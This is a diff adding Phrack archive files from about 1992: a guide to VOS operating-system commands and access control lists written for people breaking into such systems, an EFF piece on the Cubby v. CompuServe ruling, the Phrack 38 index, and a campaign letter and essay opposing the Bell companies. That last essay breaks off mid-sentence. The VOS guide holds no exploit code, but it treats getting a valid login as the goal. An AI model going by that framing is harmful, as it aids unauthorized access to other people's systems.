+                            Written by Dr. No-Good
+                                    [Echo]
+
+
+ Introduction
+ ~~~~~~~~~~~~
+        Ok, well this is a simple text file that explains the basic commands
+used by a VOS system.  VOS stands for Virtual Operating System and it is mainly
+used by businesses but other groups have used it too.
+
+        If you have any questions, you can reach me at this fine system:
+
+        Legion (202)337=2844
+
+        or if you have any questions you can e-mail the me at:
+
+        Internet:  ukelele!kclahan@UUNET.UU.NET
+
+        Special Thanks to:  Nat X, Beta Raider, Tomellicus and the
+        anonymous site of my humble work.
+
+$Note$
+
+        All material in this t-file is for informational purposes only.  Any
+abuse of this information is probably against the law and the authors of this
+text file are not responsible for the reader's actions.
+
+(*****************************************************************************)
+
+        Ok, well VOS systems can be found in various systems around the world
+and on many of the nets such as TELENET.  You can recognize a VOS system at its
+prompt.  Which looks like this:
+
+   Prompt->     (Name of System)
+                System ???, VOS Release v.(version), Module ???
+
+                (Or it just says something about a Release ver# and Module#)
+
+        After getting the log-on message you come to the hard part, getting a
+valid user/password combination.  To log-in, you type:
+
+                Login <name> <password> <CRT>
+        or
+                Login <CRT>
+                'User_name:' <name>
+                'Password?' <password>
+
+(by the way, <CRT> means enter and it comes after something you have to type
+and words in '' mean that the computer is displaying that)
+
+        When you get a valid name and password, it will say:
+
+        <name> logged in on <module#> at <year>-<month>-<day> at <time> ETA.
+
+        (then it runs start_up.cm)
+
+(*****************************************************************************)
+
+ Commands
+ ~~~~~~~~
+  HELP                      =  To get an on-line help directory.
+
+  LIST or LS                =  To list contents of the directory.
+            -dirs           =          the subdirectories.
+            -dirs <dir>     =  To confirm a directory exists.
+
+  CHANGE_CURRENT_DIR or CCD =  To change directory.
+
+  DISPLAY <file>            =  To view the contents of a file.
+            -match <string> =  To find a string in the file.
+
+  SEND_MESSAGE <name> <msg> =  To make a message appear on the receiver's
+                                  screen.  It must be 80 chars. or less.
+
+  CALL_THRU                 =  To connect your login terminal to a remote
+                                  host as a login terminal or as a slave.
+
+  SET_TERMINAL_PARAMETERS   =  To define the operating features of your
+                                  terminal such as scrolling, length, etc.
+
+  LOCATE_FILES <file names> =  To find the location of file(s) in the system.
+
+  WHO                       =  To list the current users of the system.
+
+  LIST_MODULES              =  To show which modules are running.
+
+  DISPLAY_DIR_STATUS        =  It gives information about when last saved,
+                                  when it was created, who created, and when
+                                  it was last used or modified.
+
+  DISPLAY_CURRENT_DIR       =  It shows you which directory you are in.
+
+  DISPLAY_ACCESS_LIST       =  To show you the access control lists(ACL) for
+                                  a set of files or directories.
+
+  DISPLAY_DEFAULT_ACCESS     =  To display the default access control list for
+                                  a set of directories you specify.
+
+  GIVE_ACCESS               =  To give a user/group access to a file or
+                                  directory.
+
+  GIVE_DEFAULT_ACCESS       =  To add entries to the default ACL or a
+                                  directory or set of directories.
+
+  PROPAGATE_ACCESS          =  To copy a directory(DIR)'s access to all the
+                                  directories in the subhierarchy.
+
+  REMOVE_ACCESS             =  To remove entries from the ACL of a file or
+                                  directory, or a set of such objects.
+
+  REMOVE_DEFAULT_ACCESS     =  To remove entries from the default ACL of a
+                                  directory or a set of directories.
+
+  EDIT                      =  To edit or create a file.
+                                  (We haven't been able to figure it out yet)
+
+  BIND                      =  To make an .OBJ file a .PM which can be run.
+
+  ANY_NAME.PM               =  .PM stands for program module and it is like a
+                                  .COM or .EXE executable file.
+
+  BATCH                     =  To run a batch of .PM commands.
+
+  UPDATE_BATCH_REQUESTS     =  To update the batch queue.
+
+  CANCEL_BATCH_REQUESTS     =  To totally cancel all programs in the batch
+                                  queue.
+
+  LIST_BATCH_REQUESTS       =  To list the programs in the batch queue.
+
+  RESERVE_DEVICE            =  To reserve a device for the batch queue.
+                                  (Used by administrators when they manage     
+                                   batch processing at a site)
+
+  CANCEL_DEVICE_RESERVATION =  To cancel the device reservation.
+
+  MOVE_DEVICE_RESERVATION   =  To move the device reservation to another
+                                  path.
+
+  DISPLAY_BATCH_STATUS      =  To display the status of the batch process.
+
+  COMPARE_FILE              =  To compare two files against each other.
+
+  COPY_FILE                 =  To copy a file to another file or directory.
+
+  LOCATE_FILE               =  To locate the directory the file is in.
+
+  RENAME                    =  To change the name of a file.
+
+  MOVE_FILE                 =  To move a file to another directory.
+
+  DELETE_FILE               =  To delete a file.
+
+  SET_EXPIRATION_DATE       =  To set a date on the file so it won't allow
+                                  anybody to erase it before that date.
+
+  CREATE_FILE               =  To create and name a new file.
+
+  CREATE_INDEX              =  To create a new index for a file.
+
+  CREATE_DELETED_RECORD_INDEX =  To create a list of reusable locations in a
+                                  file.
+
+  CREATE_RECORD_INDEX       =  To create an index used to map records into
+                                  a file and re-use space made available by
+                                  deletions.
+                                  (Once created, it is updated forever.)
+
+  DELETE_INDEX              =  To delete a set of indexes to a file.
+
+  DISPLAY_FILE_STATUS       =  To display information about a set of files
+                                  that you specify.
+
+  DUMP_FILE                 =  To dump the contents of a file in HEX and
+                                  ASCII onto the screen for debugging.
+
+  DUMP_RECORDS              =  To dump one or more records in a fixed,
+                                  sequential, relative, or stream file.
+
+  ENFORCE_REGION_LOCKING    =  To turn mandatory region locking on/off for
+                                  one or more stream files.
+
+  SET_FILE_ALLOCATION       =  To set the number of additional disk blocks
+                                  that the operating system allocates for a
+                                  file each time the file needs more disk
+                                  space.
+
+  SET_IMPLICIT_LOCKING      =  To turn implicit locking on/off for a file or
+                                  files.  When it is on, the system overrides
+                                  an attempt to open the file with a
+                                  different locking specification.
+
+(*****************************************************************************)
+
+$Note$
+
+        If you need any more help with the commands please try their on-line
+help program by typing HELP when you are logged in or HELP <Command> and please
+excuse the format of the command listings but if you would like a better
+listing look for the COMPLETE informational guide to VOS systems by Dr.
+No-Good.
+
+(***************************************************************************)
+
+ Security
+ ~~~~~~~~
+        The basic security for VOS uses ACL or ACCESS_CONTROL_LISTS.  These are
+lists that the creator of a directory or file make by using the GIVE_ACCESS
+command.  There are four kinds of security you can have.  They are as follows:
+
+   For file security:
+
+        NULL       -+-     That means you can't do anything with it.
+        READ       -+-     You can READ it but not modify it.
+       WRITE       -+-     That means you have READ and WRITE access to it
+                             so you can modify it.
+     EXECUTE       -+-     That means they can read it and run it.
+
+   For directory security:
+
+      MODIFY       -+-      That means you can add, remove, change, and
+                              execute files in the directory.
+      STATUS       -+-      That means you can display_dir_status and
+                              view the current status of the directory.
+        NULL       -+-      That means you can not access the directory.
+
+        If you don't have the appropriate security for the directory or file it
+is because the owner/creator of the file or directory doesn't have you on the
+list and since this informational file doesn't contain the information needed
+to get access to files that you haven't been given access to then it is
+advisable to look for more informational files from [ECHO].
+
diff --git a/phrack37/9.txt b/phrack37/9.txt
new file mode 100644
index 0000000..c515f87
--- /dev/null
+++ b/phrack37/9.txt
@@ -0,0 +1,107 @@
+                Volume Four, Issue Thirty-Seven, File 9 of 14
+
+                              THE COMPUSERVE CASE
+        A STEP FORWARD IN FIRST AMENDMENT PROTECTION FOR ONLINE SERVICES
+
+                  Presented by Electronic Frontier Foundation
+
+
+ Introduction
+ ~~~~~~~~~~~~
+ by Mike Godwin (mnemonic@eff.org) in EFFector Online 3.03
+
+By now you may have heard about the summary-judgment decision in Cubby, Inc. v.
+CompuServe, a libel case.  What you may not know is why the decision is such an
+important one. By holding that CompuServe should not be liable for defamation
+posted by a third-party user, the court in this case correctly analyzed the
+First Amendment needs of most online services.  And because it's the first
+decision to deal directly with these issues, this case may turn out to be a
+model for future decisionsin other courts.
+
+The full name of the case, which was decided in the Southern District of New
+York, is Cubby Inc. v. CompuServe. Basically, CompuServe contracted with a
+third party for that user to conduct a special-interest forum on CompuServe.
+The plaintiff claimed that defamatory material about its business was posted a
+user in that forum, and sued both the forum host and CompuServe.  CompuServe
+moved for, and received, summary judgment in its favor.
+
+Judge Leisure held in his opinion that CompuServe is less like a publisher than like a bookstore owner or book distributor.  First Amendment law allows
+publishers to be liable for defamation, but not bookstore owners, because
+holding the latter liable would create a burden on bookstore owners to review
+every book they carry for defamatory material.  This burden would "chill" the
+distribution of books (not to mention causing some people to get out of the
+bookstore business) and thus would come into serious conflict with the First
+Amendment.
+
+So, although we often talk about BBSs as having the rights of publishers and
+publications, this case hits on an important distinction.  How are publishers
+different from bookstore owners?  Because we expect a publisher (or its agents)
+to review everything prior to publication.  But we *don't* expect bookstore
+owners to review everything prior to sale.  Similarly, in the CompuServe case,
+as in any case involving an online service in which users freely post messages
+for the public (this excludes Prodigy), we wouldn't expect the online-
+communications service provider to read everything posted *before* allowing it
+to appear.
+
+It is worth noting that the Supreme Court case on which Judge Leisure relies is
+Smith v. California -- an obscenity case, not a defamation case.  Smith is the
+Supreme Court case in which the notion first appears that it is generally
+unconstitutional to hold bookstore owners liable for content.  So, if Smith v.
+California applies in a online-service or BBS defamation case, it certainly
+ought to apply in an obscenity case as well.
+
+Thus, Cubby, Inc. v. CompuServe sheds light not only on defamation law as
+applied in this new medium but on obscenity law as well.  This decision should
+do much to clarify to concerned sysops what their obligations and liabilities
+are under the law.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+ Highlights of the CompuServe Decision
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Danny Weitzner (djw@eff.org) in EFFector Online 3.03
+
+"CompuServe's CIS [CS Information Service] product is in essence an electronic,
+for-profit library that carries a vast number of publications and collects
+usage and membership fees from its subscribers in return for access to the
+publications.  CompuServe and companies like it are at the forefront of the
+information industry revolution.  High technology has markedly increased the
+speed with which information is gathered and processed; it is now possible for
+an individual with a personal computer, modem, and telephone line to have
+instantaneous access to thousands of news publications from across the United
+States and around the world.  While CompuServe may decline to carry a given
+publication altogether, in reality, once it does decide to carry a given
+publication, it will have little or no editorial control over that
+publication's contents.  This is especially so when CompuServe carries the
+publication as part of a forum that is managed by a company unrelated to
+CompuServe.  "... CompuServe has no more editorial control over ... [the
+publication in question] ... than does a public library, book store, or
+newsstand, and it would be no more feasible for CompuServe to examine every
+publication it carries for potentially defamatory statements than it would for
+any other distributor to do so."
+
+"...Given the relevant First Amendment considerations, the appropriate standard
+of liability to be applied to CompuServe is whether it knew or had reason to
+know of the allegedly defamatory Rumorville statements."
+
+Cubby, Inc. v. CompuServe, Inc. (90 Civ. 6571, SDNY)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+For the full opinion, please see:
+
+
+           CUBBY, INC., a Corporation d/b/a SKUTTLEBUT, and ROBERT G.
+          BLANCHARD, Plaintiffs, v. COMPUSERVE INC., d/b/a RUMORVILLE,
+                 and DON FITZPATRICK, individually, Defendants
+
+                            No.  90 Civ. 6571  (PKL)
+
+           UNITED STATES DISTRICT COURT FOR THE SOUTHERN DISTRICT OF
+                                    NEW YORK
+
+
+                           October 29, 1991, Decided
+                            October 29, 1991, Filed
+
diff --git a/phrack38/1.txt b/phrack38/1.txt
new file mode 100644
index 0000000..8c49a1a
--- /dev/null
+++ b/phrack38/1.txt
@@ -0,0 +1,96 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 1 of 15
+
+                              Issue XXXVIII Index
+                              ___________________
+
+                               P H R A C K   3 8
+
+                                 April 26, 1992
+                              ___________________
+
+                          "Countdown to SummerCon '92"
+
+                  "Get ready for the biggest and best computer
+                     hacker PARTY conference of the year!"
+
+Phrack Inc. is proud to be the official sponsor of the 6th Annual SummerCon,
+but this year is something different.
+
+The date and location for this year's Summer Conference are for those with a
+need to know.  SummerCon is a private party, its for our friends, and its our
+business and nobody elses'.  Events from our past have made it necessary to
+keep the important specifics under wraps, so our theme this year is privacy.
+
+Would be informants, ignorant and biased security professionals, and little
+malicious rodent hackers can forget about receiving an invitation.  We are
+making a list and checking it twice.  If you would like to receive an
+invitation and details about SummerCon then send mail to
+"summer@stormking.com".
+
+Meanwhile, back at Phrack...
+
+It appears that Phrack is getting VERY popular.  At last count we had well over
+775 people directly subscribed to the Phrack Mailing List.  However, some
+people aren't overjoyed at Phrack's popularity.  In recent postings to EFF
+newsgroups, complaints have been lodged that people downloading Phrack from
+"ftp.eff.org" account for more than 1/3 of all ftp traffic on that site.  Some
+people at EFF have even suggested that Phrack be removed completely from their
+system.  When the high and mighty defenders of Knight Lightning's First
+Amendment rights begin to balk, what does that say to the community at large
+about EFF and their agenda?
+
+In this issue of Phrack we feature "Cellular Telephony" by Brian Oblivion!
+Brian tells us to expect more files on this topic from him in the near future,
+but for now we can start with this very substantial taste.  Additionally, this
+issue will wrap up Black Kat's 3-part series on VAX/VMS and Dispater's 2-part
+defense manual for police radar.  Rambone is back with his second file on the
+Pirate community and Datastream Cowboy picks up where Taran King left off in
+Phrack 30 with Network Miscellany.  And if that wasn't enough, Mycroft brings
+us a file on Wide Area Information Services (WAIS).  Subtitled "How Do I Use It
+and Why Should I Care?"  It tells you about the service in general and gives
+directions for using WAIS to review Phrack.
+
+Another spotlight file in this issue is "Standing Up To Fight The Bells."
+Knight Lightning brings forth a message and a warning about what is happening
+right now in the Congress and Senate of the United States, where the Bell
+Operating Companies are seeking to hold on to yet another monopoly to control.
+Be prepared to act and act fast or live forever with the consequences -- the
+future of information services controlled by Ma Bell.
+
+And finally the full details of Computers, Freedom, & Privacy II appear both in
+a special file by Max Nomad and in two smaller articles in Phrack World News
+(part 3).
+
+We're back and we're Phrack.  Enjoy reading it because we enjoy writing it!
+
+           Chief Editor:          Dispater (dispater@stormking.com)
+           Staff:                 Datastream Cowboy
+                                  Digital Disciple
+                                  NetLink
+                                  Takkel Genius
+                                  The Public
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by Dispater                                                06K
+ 2. Phrack Loopback by Phrack Staff                                         12K
+ 3. Phrack Pro-Phile on Aristotle by Dispater                               06K
+ 4. Pirates' Cove by Rambone                                                23K
+ 5. Network Miscellany IV by Datastream Cowboy                              30K
+ 6. Beating The Radar Rap Part 2 of 2 by Dispater                           15K
+ 7. Users Guide to VAX/VMS Part 3 of 3 by Black Kat                         46K
+ 8. Wide Area Information Services by Mycroft                               11K
+ 9. Cellular Telephony by Brian Oblivion                                    28K
+10. Standing Up To Fight The Bells by Knight Lightning                      27K
+11. The Digital Telephony Proposal by the Federal Bureau of Investigation   34K
+12. PWN Special Report VI on CFP-2 by Max Nomad                             18K
+13. PWN/Part 1 by Dispater and Datastream Cowboy                            34K
+14. PWN/Part 2 by Dispater and Datastream Cowboy                            32K
+15. PWN/Part 3 by Dispater and Datastream Cowboy                            33K
+
+    Total:                                                                 355K
+_______________________________________________________________________________
diff --git a/phrack38/10.txt b/phrack38/10.txt
new file mode 100644
index 0000000..70525ab
--- /dev/null
+++ b/phrack38/10.txt
@@ -0,0 +1,531 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 10 of 15
+
+                         Standing Up To Fight The Bells
+
+                              by Knight Lightning
+                                kl@stormking.com
+
+Did you hear about 1-800-54-Privacy?  Did you decide to call?  I did and the
+following is the information I received a few weeks later.  It outlines some of
+the serious ramifications of what is going to happen if we do not actively
+support Congressional bills S 2112 and HR 3515.
+
+The information comes from the American Newspaper Publisher's Association
+(ANPA).  Keep in mind, they have a vested financial interest in information
+services as do many others, and in many ways, the newspaper industry can be and
+has been just as bad as the Regional Bell Operating Companies.  However, in
+this particular situation, the ANPA has the right idea and does a pretty good
+job in explaining why we need to act now and act fast.
+
+You know who I am, and what I've been through.  My experiences have given me a
+unique perspective and insight into the methods and goals of the Regional Bell
+Operating Companies.  They are inherently deceptive and if given even the
+slightest chance, they will screw the consumer and engage in anti-competitive
+market practices.  Additionally, their tactics threaten our personal privacy as
+well.
+
+The RBOCs must be stopped before it's too late.
+
+
+:Knight Lightning
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+1-800-54-Privacy
+444 N. Michigan Avenue
+Suite 900
+Chicago, Illinois  60611
+
+
+
+February 14, 1992
+
+
+
+Dear Consumer:
+
+If you're like many people, you may have been hesitant about leaving your name
+and address on our 1-800-54-PRIVACY phone line.
+
+Why?
+
+Quite simply, no one wants to give out information about themselves without
+knowing exactly how that information is going to be used.
+
+But the truth is, you reveal information about yourself EACH AND EVERY TIME YOU
+PICK UP THE PHONE.  By tracking who you call, how often you call and how long
+each conversation lasts, the seven regional Bell telephone companies have the
+capability to learn and know more about you than even the IRS.
+
+In fact, with modern computer technology, there is practically no limit to what
+the Bells can learn about your personal life every time you pick up the phone.
+And there is virtually no limit -- only one's imagination -- to the ways they
+can take advantage of all the information they glean.
+
+Of course its one thing to have the capability to do this snooping.  It's
+another thing to have the incentive to actually do it.
+
+Until October 7, 1991, the incentive just didn't exist for the Bells.  Prior to
+this date, the vast electronic networks of the Bell monopolies were just
+neutral carriers of phone messages, data, and other companies' fax, audiotex,
+and videotex services.
+
+For example, when you last called a 1-900 or 1-800 line to get the latest stock
+quotes, sports scores, or headlines, your local phone company served simply as
+the pipeline for moving the billions of electrons in your call.  The company
+that provided you with the information over the phone line was not -- and by
+law, could not be -- the phone company.
+
+And that's the way things had been since 1984, when U.S. District Court Judge
+Harold Greene issued his now-famous decree breaking up the AT&T monopoly and
+spinning off control of local phone service to seven regional Bell companies.
+
+In the decree, the Court expressly prohibited the individual Bells from
+entering three businesses -- cable TV, telephone manufacturing, and electronic
+information services.
+
+Why?
+
+After presiding over the lengthy AT&T anti-trust case and being exposed to
+hundreds upon hundreds of monopolistic abuses by AT&T, Judge Greene's Court was
+firmly convinced that, if allowed to enter any of these three current areas,
+the Bells would undoubtedly engage in the same monopolistic behavior that
+characterized their former parent.
+
+In other words, while cutting off the hydra-like AT&T head, Judge Greene was
+fearful that, given too much leeway, AT&T's seven so-called "Baby Bell"
+off-spring might become equal or worse monsters themselves.
+
+>From day one, however, the Bells undertook a long-term, multi-million dollar
+lobbying campaign to fight Judge Greene's ruling and try to convince the
+Justice Department, the higher courts, and even the U.S. Congress that they
+should be permitted to enter the content end of the information service
+business.
+
+And, so, on October 7, 1991, after years of heavy lobbying, a higher court came
+through for the Bells and practically ordered Judge Greene to overturn his 1984
+decree and open up the information services industry to the Bells.
+
+In the 71-page ruling, a very reluctant Judge Greene devoted two-thirds of his
+decision to explaining why allowing the Bells to sell information services was
+bad for consumers and bad for America.
+
+For example, he went to great length to discount the Bells' claim that, once
+given the green light, they would be better able to serve the public than the
+thousands of already existing electronic information services.  To quote from
+his decision.
+
+     "In the first place, the contention that it will take the Regional
+     Companies (the Bells) to provide better information services to the
+     American public can only be described as preposterous."
+
+Judge Green also wrote:
+
+     "Moreover, the Court considers the claim that the Regional Companies'
+     entry into information services would usher in an era of sophisticated
+     information services available to all as so much hype."
+
+His decision also contains a warning regarding the prices consumers will be
+forced to pay for Bell-provided services:
+
+     "The Regional Companies would be able to raise price by increasing their
+     competitors' costs, and they could raise such costs by virtue of the
+     dependence of their rivals' information services on local network access."
+
+Finally, here's what Judge Greene had to say about his court's decision and the
+public good:
+
+     "Were the Court free to exercise its own judgment, it would conclude
+      without hesitation that removal of the information services restriction
+      is incompatible with the decree and the public interest."
+
+If Judge Greene's warnings as well as his profound reluctance to issue this
+ruling scare you, they should.
+
+That's because the newly freed Bells now have the incentive, which they never
+had before, to engage in the anti-competitive, anti-consumer practices that
+Judge Greene feared.
+
+Besides using your calling records to sell you information services they think
+you're predisposed to buy, the Bell's may well try to auction off your phone
+records to the highest bidder.
+
+As a result, anyone who ever uses a phone could well be a potential victim of
+the Bell's abuse.
+
+Consider the simple act of making a telephone call to an auto repair shop to
+schedule body work or a tune-up.  By knowing that you made that call, your
+phone company might conclude that you're in the market for a new car and sell
+your name to local car dealers.
+
+Another example.  Think about calling a real estate broker for information on
+mortgage rates.  Knowing you must be in the market for a house, the Bells could
+sell your name to other brokers.  Or they could try to sell you their own
+electronic mortgage rate service.
+
+Now let's say you and your spouse are having some problems and one of you calls
+a marriage counselor.  Tipped off by information purchased from the phone
+company, a divorce lawyer shows up on your doorstep the next morning.
+
+Finally, think about calling your favorite weather service hotline -- a
+competitor to the weather service operated by your local phone company.  By
+keeping track of people who use its competitor's service, the phone company
+might just try to get you to buy its weather service instead.
+
+Far-fetched?  Not at all.
+
+Nefarious?  You bet.
+
+That doesn't mean that, starting tomorrow, your phone company is going to start
+tracking who you call, how long your calls last, and who calls you.  However,
+they could do it if they wanted to.  And, based on past experience, some of
+them probably will do so at one point or another.
+
+That's because the protest of gaining an unfair edge over the competition --
+companies that have no choice but to depend upon the Bells' wires -- is just
+too tantalizing a temptation for the Bells to ignore.
+
+As you might expect, the Bells claim that these fears are totally unfounded and
+that strict regulations are in place to prevent them from abusing your
+telephone privacy.
+
+However, there simply aren't enough regulators in the world to control the
+monopolistic tendencies and practices of the Bells.  Every single one of the
+seven Bells has already abused its position as a regulated monopoly.  There is
+no reason to believe they won't in the future.
+
+For example, the Georgia Public Service Commission recently found that
+BellSouth had abused its monopoly position in promoting its MemoryCall voice
+mail system.  Apparently, operators would try to sell MemoryCall when customers
+called to arrange for hook-up to competitors' voice-mail services.  Likewise,
+while on service calls, BellSouth repair personnel would try to sell MemoryCall
+to people using competitors' systems.  BellSouth even used competitors' orders
+for network features as sales leads to steal customers.
+
+In February 1991, US West admitted it had violated the law by providing
+prohibited information services, by designing and selling telecommunications
+equipment and by discriminating against a competitor.  The Justice Department
+imposed a $10 million fine -- 10 times larger than the largest fine imposed in
+any previous anti-trust division contempt case.
+
+In February 1990, the Federal Communications Commission found that one of
+Nynex's subsidiaries systematically overcharged another Nynex company $118
+million for goods and services and passed that extra cost on to ratepayers.
+
+The abuses go on and on.
+
+In this brave new world, however, it's just not consumers who will suffer.
+Besides invading your privacy, the Bells could abuse their position as
+monopolies to destroy the wide range of useful information services already
+available.
+
+Right now, there are some 12,000 information services providing valuable news,
+information, and entertainment to millions of consumers.  Every one of these
+services depends on lines owned and controlled by Bell monopolies.
+
+This makes fair competition with the Bells impossible.
+
+It would be like saying that Domino's Pizzas could only be delivered by Pizza
+Hut.
+
+It would be like asking a rival to deliver a love note to your sweetheart.
+
+It would be a disaster.
+
+If the Bells aren't stopped, they will make it difficult -- if not impossible
+-- for competitors to use Bell wires to enter your home.
+
+They could deny competitors the latest technological advances and delay the
+introduction of new features.  They could even undercut competitor's prices by
+inflating local phone bills to finance the cost of their own new information
+services.
+
+In the end, the Bells could drive other information services out of business,
+thereby dictating every bit of information you receive and depriving the
+American public out of the diversity of information sources it deserves and
+that our form of government demands.
+
+Can something be done to stop the Bells?
+
+Yes, absolutely.
+
+You can take several immediate steps to register your views on this issue.
+Those steps are described in the attached "Action Guidelines" sheet.  Please
+act right away.
+
+In the meantime, on behalf of our growing coalition of consumer groups,
+information services providers, and newspapers, thank you for your interest in
+this important issue.
+
+Sincerely,
+
+Cathleen Black
+President and Chief Executive Officer
+American Newspaper Publishers Association
+
+- - - - - - - - - - - - - - - - - - - - - - - - -  - - - - - - - - - - - - - -
+
+                               ACTION GUIDELINES
+
+Something is very wrong when a monopoly is put into the position where it can
+abuse your privacy, drive competitors from the market, and even force you, the
+captive telephone ratepayer, to subsidize the costs of new information services
+ventures.
+
+Can something be done to stop this potential abuse?
+
+Absolutely.
+
+WHAT YOU CAN DO.  The first step is to call or write your local telephone
+company to assert your right to privacy.
+
+The second step is to write your U.S. Representative and U.S. Senators and urge
+them to support House bill 3515 and Senate bill 2112.
+
+Since the purpose of both HR 3515 and S 2112 is to prevent the Bells from
+abusing their monopoly position, not to prevent legitimate competition, the
+Bells would be free to sell information services in any area of the country
+where they do not have a monopoly -- in other words, 6/7 of the country.
+
+However, the bills would delay entry of the Bell companies into the information
+services industry in their own regions until they no longer held a monopoly
+over local phone service.  As soon as consumers were offered a real choice in
+local phone service -- whether it be cellular phones, satellite communications,
+or other new technology -- the Bells would be free to offer any information
+services they wanted.
+
+Both bills are fair to everyone.  They protect consumer privacy and ensure that
+the thriving information services industry will remain competitive.
+
+Quick action is need to pass these bills.  A hand-written letter stating your
+views is the most effective way of reaching elected officials.  It is proof
+positive that you are deeply concerned about the issue.
+
+
+POINTS TO MAKE IN YOUR LETTER
+
+You may wish to use some or all of the following points:
+
+     A phone call should be a personal and private thing -- not a sales
+     marketing tool for the phone company.
+
+     The Bells should not be allowed to take unfair advantage of information
+     they can obtain about you by virtue of owning and controlling the wires
+     that come into homes.
+
+     The Bells must not be allowed to abuse their position as monopolies to
+     drive existing information services out of business.
+
+     The Bells should not be permitted to engage in activities that would
+     deprive Americans of the information diversity they deserve and that our
+     form of government demands.
+
+     The Bells should not be permitted to finance information services ventures
+     by inflating the phone bills of captive telephone ratepayers.
+
+
+AFTER YOU'VE WRITTEN YOUR LETTER
+
+After you've written your letter or made your phone call, please send us a
+letter and tell us.  By sending us your name and address, you'll receive
+occasional updates on the massive effort underway to prevent the Bells from
+invading your privacy and turning into the monopolistic monsters that Judge
+Greene warned about.
+
+There's one more thing you can do.  Please ask your friends, relatives,
+neighbors, and co-workers to urge their U.S. Representatives and Senators to
+support HR 3515 and S 2112.  We need everyone's help if we're going to stop the
+Bells.
+
+1-800-54-PRIVACY
+444 N. Michigan Avenue
+Suite #900
+Chicago, Illinois  60611
+
+* * * * * * ** * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * *
+
+                           Support HR 3515 and S 2112
+
+                                 by Toby Nixon
+                                tnixon@hayes.com
+
+                                February 7, 1992
+
+
+DISCLAIMER:  The following is my personal position on this matter, and not
+             necessarily that of my employer.
+
+I am appalled at the RBOC's disinformation regarding HR 3515/S 2112, which
+propose to limit RBOC entry into information services until fair competition is
+possible.  Every time one of the RBOC ads has played on the TV or radio,
+appeared in the newspaper, and now in the information they mailed to me, I
+can't help but stand up out of my chair and scream because of the contemptible
+lies.
+
+Clearly, all of the services they claim are being held back are, or could be,
+available TODAY.  We are IN the Information Age; where have they been?  It's
+HERE, not "just over the horizon."  We don't need the RBOCs to provide these
+services; all the RBOCs need to do is continue to provide the transmission
+services, which they do today.  Unfortunately, the majority of the citizens of
+the USA don't know that these services are already available WITHOUT RBOC HELP
+-- and the RBOCs are taking advantage of this lack of knowledge to try to gain
+popular support for their positions.
+
+What would happen if the RBOCs were to enter these markets?  It is clear to me,
+based on their past performance in similar situations (such as voicemail) that
+they would leverage their monopoly on local telephone service to force
+competitors out of the market.  They will use their guaranteed return on
+investment income from their monopoly on POTS to subsidize their information
+services (even providing co-location with central office switches is a
+subsidy), thereby indeed providing the "affordability" they talk about -- until
+the competition is driven out of the marketplace.  Then the RBOCs will be free
+to raise the rates as high as they wish!  With their monopoly on access, they
+could easily sabotage access to competitive services and make the RBOC services
+look better (just being co-located will provide better circuit quality and
+response times).  While all of the competition would have to pay exorbitant
+rates for ONA services (to obtain ANI information, billing to phone accounts,
+etc.), the phone company has this free.  Free competition?  Hardly!
+
+Many of you know that I am a Libertarian, and strongly oppose government
+regulation of business.  The logical position for a Libertarian might appear to
+be to support the RBOC's fight against further regulation.  But the fact is
+that they've enjoyed this GOVERNMENT-IMPOSED monopoly for decades; in too many
+ways, the RBOCs function as though they were an arm of the government.  They
+have effectively no competition for local access.  Every competitive service
+MUST use the RBOCs' facilities to reach their customers.  This places the RBOCs
+in the position of being able to effectively control their competition --
+meaning there would be no effective competition at all.
+
+Despite their protestations that the proposed legislation would limit "consumer
+choice" and "competition", the reality is that provision of such services by
+RBOCs, so long as they remain the sole provider of local telephone service in
+most of the country, would be anti-choice and anti-competitive, plain and
+simple.  It would be ABSOLUTELY UNFAIR for the government to turn them loose to
+use their monopoly-guaranteed income to try to put independent information
+services (even BBSes) out of business, when it is the government that has
+permitted (required!) them to get the monopoly in the first place.
+
+It absolutely disgusts me that in their printed materials the RBOCs go so far
+as to forment class warfare.  They talk about "the spectre of 'information
+rich' versus 'information poor'".  They say that minorities, the aged, and the
+disabled support their position, to raise liberal guilt and stir up class envy
+(but without disclosing what have certainly been massive contributions to these
+groups in return for their support).  They further stir up class envy by making
+the point that Prodigy and CompuServe customers are "... highly educated
+professionals with above average incomes, owning homes valued above national
+norms ... the world's most affluent, professional, and acquisitive people," as
+though this were somehow evil!  They attack, without stating any evidence, the
+alleged "reality" that the only reason this legislation is proposed is to prop
+up newspaper advertising revenues (the whole attitude of "evil profits" is so
+hypocritical coming from those for whom profits are guaranteed, and whom never
+mention the fact that they're not entering information services out of altruism
+but only because they seek to expand their own profits!).  They invoke
+jingoistic fervor by talking about services "already being enjoyed by citizens
+of other countries" (but at what incredible cost?).
+
+The materials are packed with this politically-charged rhetoric, but completely
+lacking in facts or reasonable explanation of the basis for the positions of
+either side.  Their letter isn't written for a politically and technologically
+aware audience, but for those who are attuned to the anti-capitalistic culture
+of envy and redistribution.  It isn't written for those trying to make an
+informed decision on the issues, but is intended simply to rally the ignorant
+into flooding Congressional offices with demands for services that most of the
+writers wouldn't know the first thing to do with, and which the writers don't
+realize are available without the RBOCs.
+
+They talk about some supposed "right" of individuals to participate in "the
+Information Age", regardless of, among other things, INCOME.  Does all of this
+appeal to the plight of the poor and disadvantaged mean that these services
+will be available regardless of ability to pay?  Hardly!  WE, the taxpayers,
+WE, the RBOC customers, without any choice of who provides our local phone
+service, will pay -- through the nose -- either in the form of cross-
+subsidization of "lifeline" (!) information services by those of us paying
+"full" residential rates or business rates, or by tax-funded government
+subsidies or credits going directly to the RBOCs.  Does anybody really think
+that the RBOCs will cover the cost of providing these services to the
+"information poor" out of their profits?  What a ridiculous idea!
+
+The fact that the RBOC position is supported by groups like the NAACP and the
+National Council on Aging -- representing the most politically-favored, most
+tax-subsidized groups in America -- make it clear that they fully intend for
+the cost of such services to be born by the middle class and small business-
+people of America.  Once again, the productive segments of society get screwed.
+Once again, private businesses which have fought to build themselves WITHOUT
